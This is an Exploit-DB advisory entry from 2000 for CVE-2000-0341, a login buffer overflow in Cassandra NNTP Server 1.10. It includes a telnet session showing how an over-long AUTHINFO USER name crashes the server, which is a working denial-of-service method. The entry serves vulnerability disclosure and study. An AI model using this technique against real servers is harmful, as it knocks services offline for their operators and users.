Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow Vulnerability

2000-05-01T00:00:00
ID EDB-ID:19884
Type exploitdb
Reporter Ussr Labs
Modified 2000-05-01T00:00:00

Description

Atrium Software Cassandra NNTP Server 1.10 Buffer Overflow Vulnerability. CVE- 2000-0341,CVE-2000-0341. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/1156/info

Unchecked buffer exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.

[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed) 

AUTHINFO USER <10 000 character string>


Where buffer is 10000 characters.